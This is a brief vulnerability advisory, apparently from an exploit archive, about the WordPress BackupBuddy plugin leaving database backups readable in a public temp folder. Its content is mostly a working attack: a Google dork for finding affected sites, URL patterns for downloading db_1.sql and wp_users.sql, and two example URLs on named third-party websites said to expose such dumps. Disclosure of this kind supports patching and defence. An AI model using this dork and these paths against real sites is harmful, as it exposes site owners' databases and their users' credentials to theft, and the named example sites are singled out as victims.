# WordPress 'BackupBuddy' Plugin Exposure Backup File to Unauthorized Control
# CWE: CWE-530
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 15/05/2015
# Vendor Homepage: https://ithemes.com/purchase/backupbuddy/
# Google Dork: inurl:/wp-content/uploads/backupbuddy_temp/

# PoC : 

http://SITE.COM/wp-content/upload/backupbuddy_temp/"RANDOM NAME"/db_1.sql      OR 
http://SITE.COM/wp-content/upload/backupbuddy_temp/"RANDOM NAME"/wp_users.sql

# Examples:

http://intouchhome.com/wp-content/uploads/backupbuddy_temp/rollback_nwb0cpc4r6/wp_users.sql
http://www.article2range.com/wp-content/uploads/backupbuddy_temp/61fmr70xk7/db_1.sql

And Others...